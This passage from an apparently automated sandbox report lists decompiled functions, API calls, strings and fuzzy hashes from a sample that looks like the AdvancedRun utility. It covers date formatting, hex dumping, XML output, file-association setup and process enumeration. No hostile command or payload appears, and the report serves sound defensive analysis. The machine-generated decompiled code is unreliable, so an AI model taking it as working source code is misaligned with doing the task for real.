                                                                                                                                                                                                                          0x004037af
                                                                                                                                                                                                                          0x004037b7
                                                                                                                                                                                                                          0x004037c3
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004037d4
                                                                                                                                                                                                                          0x004037dc

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004036F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403712
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                            • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                                                                                                                            • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                                                                                                                            • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                                                                                                                            • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                                                                                                                            • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                                                                                                                            • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004037C3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                                                                          • String ID: L$cfg
                                                                                                                                                                                                                          • API String ID: 275899518-3734058911
                                                                                                                                                                                                                          • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                                                                          • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                                                                                                                          0x00404ed0
                                                                                                                                                                                                                          0x00404edf
                                                                                                                                                                                                                          0x00404ef6
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00404f00
                                                                                                                                                                                                                          0x00404f1c
                                                                                                                                                                                                                          0x00404f31
                                                                                                                                                                                                                          0x00404f41
                                                                                                                                                                                                                          0x00404f4e
                                                                                                                                                                                                                          0x00404f5d
                                                                                                                                                                                                                          0x00404f66
                                                                                                                                                                                                                          0x00404f69
                                                                                                                                                                                                                          0x00404f69
                                                                                                                                                                                                                          0x00404f71
                                                                                                                                                                                                                          0x00404f77
                                                                                                                                                                                                                          0x00404f7d

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404F41
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00404F4E
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00404F5D
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404F71
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                                                          • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                                                                          • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                                          			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                                                                                                                          0x00404fe0
                                                                                                                                                                                                                          0x00404fe9
                                                                                                                                                                                                                          0x00405000
                                                                                                                                                                                                                          0x00405005
                                                                                                                                                                                                                          0x00405009
                                                                                                                                                                                                                          0x0040500c
                                                                                                                                                                                                                          0x0040500e
                                                                                                                                                                                                                          0x00405015
                                                                                                                                                                                                                          0x00405016
                                                                                                                                                                                                                          0x00405021
                                                                                                                                                                                                                          0x00405026
                                                                                                                                                                                                                          0x00405027
                                                                                                                                                                                                                          0x0040502c
                                                                                                                                                                                                                          0x00405031
                                                                                                                                                                                                                          0x00405039
                                                                                                                                                                                                                          0x0040503f
                                                                                                                                                                                                                          0x00405044
                                                                                                                                                                                                                          0x00405048
                                                                                                                                                                                                                          0x0040504e
                                                                                                                                                                                                                          0x00405056
                                                                                                                                                                                                                          0x0040505c
                                                                                                                                                                                                                          0x0040504e
                                                                                                                                                                                                                          0x00405065
                                                                                                                                                                                                                          0x0040506a
                                                                                                                                                                                                                          0x00405072
                                                                                                                                                                                                                          0x00405079

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                                          • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                                                                          • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                                                          			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                                                                                                                          0x00407d9c
                                                                                                                                                                                                                          0x00407d9e
                                                                                                                                                                                                                          0x00407da5
                                                                                                                                                                                                                          0x00407db3
                                                                                                                                                                                                                          0x00407dba
                                                                                                                                                                                                                          0x00407dc5
                                                                                                                                                                                                                          0x00407dc7
                                                                                                                                                                                                                          0x00407dd0
                                                                                                                                                                                                                          0x00407dc9
                                                                                                                                                                                                                          0x00407dc9
                                                                                                                                                                                                                          0x00407dc9
                                                                                                                                                                                                                          0x00407dd8
                                                                                                                                                                                                                          0x00407de1
                                                                                                                                                                                                                          0x00407de5
                                                                                                                                                                                                                          0x00407deb
                                                                                                                                                                                                                          0x00407df2
                                                                                                                                                                                                                          0x00407df3
                                                                                                                                                                                                                          0x00407dfe
                                                                                                                                                                                                                          0x00407e03
                                                                                                                                                                                                                          0x00407e04
                                                                                                                                                                                                                          0x00407e21

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                                                                                                                          • <%s>, xrefs: 00407DF3
                                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                          • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                                                                          • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                                                                                                                          0x00403b56
                                                                                                                                                                                                                          0x00403b5d
                                                                                                                                                                                                                          0x00403b6f
                                                                                                                                                                                                                          0x00403b76
                                                                                                                                                                                                                          0x00403b82
                                                                                                                                                                                                                          0x00403b8d
                                                                                                                                                                                                                          0x00403b8e
                                                                                                                                                                                                                          0x00403b99
                                                                                                                                                                                                                          0x00403b9e
                                                                                                                                                                                                                          0x00403b9f
                                                                                                                                                                                                                          0x00403ba7
                                                                                                                                                                                                                          0x00403bb9
                                                                                                                                                                                                                          0x00403bce
                                                                                                                                                                                                                          0x00403be5
                                                                                                                                                                                                                          0x00403bef
                                                                                                                                                                                                                          0x00403bf8
                                                                                                                                                                                                                          0x00403c00

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403B5D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403B76
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                                                                                                                            • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                                                                            • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                                                                            • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                                                                                                                          • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                                                                                                                          • API String ID: 1832587304-479876776
                                                                                                                                                                                                                          • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                                                                          • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                                                                                                                          0x0040afd3
                                                                                                                                                                                                                          0x0040afe2
                                                                                                                                                                                                                          0x0040aff3
                                                                                                                                                                                                                          0x0040b002
                                                                                                                                                                                                                          0x0040b023
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040b047
                                                                                                                                                                                                                          0x0040b02e
                                                                                                                                                                                                                          0x0040b034
                                                                                                                                                                                                                          0x0040b03c
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040B002
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
                                                                                                                                                                                                                            • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                                                          • API String ID: 393120378-2245444037
                                                                                                                                                                                                                          • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                                                                          • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                                          • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                                                                                                                          • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                                                          			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}
























                                                                                                                                                                                                                          0x004092f3
                                                                                                                                                                                                                          0x004092fb
                                                                                                                                                                                                                          0x00409303
                                                                                                                                                                                                                          0x00409305
                                                                                                                                                                                                                          0x00409310
                                                                                                                                                                                                                          0x00409439
                                                                                                                                                                                                                          0x0040943f
                                                                                                                                                                                                                          0x00409445
                                                                                                                                                                                                                          0x0040944e
                                                                                                                                                                                                                          0x00409452
                                                                                                                                                                                                                          0x00409466
                                                                                                                                                                                                                          0x0040946e
                                                                                                                                                                                                                          0x00409475
                                                                                                                                                                                                                          0x004094f7
                                                                                                                                                                                                                          0x00409488
                                                                                                                                                                                                                          0x00409494
                                                                                                                                                                                                                          0x004094a5
                                                                                                                                                                                                                          0x004094a9
                                                                                                                                                                                                                          0x004094b5
                                                                                                                                                                                                                          0x004094c3
                                                                                                                                                                                                                          0x004094c6
                                                                                                                                                                                                                          0x004094d5
                                                                                                                                                                                                                          0x004094e3
                                                                                                                                                                                                                          0x004094f1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004094f1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004094e3
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004094f7
                                                                                                                                                                                                                          0x00409452
                                                                                                                                                                                                                          0x00409322
                                                                                                                                                                                                                          0x0040932b
                                                                                                                                                                                                                          0x00409333
                                                                                                                                                                                                                          0x00409337
                                                                                                                                                                                                                          0x00409341
                                                                                                                                                                                                                          0x00409342
                                                                                                                                                                                                                          0x0040934e
                                                                                                                                                                                                                          0x0040934f
                                                                                                                                                                                                                          0x00409358
                                                                                                                                                                                                                          0x0040935e
                                                                                                                                                                                                                          0x0040935e
                                                                                                                                                                                                                          0x00409363
                                                                                                                                                                                                                          0x0040936b
                                                                                                                                                                                                                          0x0040936d
                                                                                                                                                                                                                          0x00409377
                                                                                                                                                                                                                          0x00409385
                                                                                                                                                                                                                          0x0040938d
                                                                                                                                                                                                                          0x0040939d
                                                                                                                                                                                                                          0x004093a5
                                                                                                                                                                                                                          0x004093ac
                                                                                                                                                                                                                          0x004093b4
                                                                                                                                                                                                                          0x004093c5
                                                                                                                                                                                                                          0x004093c9
                                                                                                                                                                                                                          0x004093da
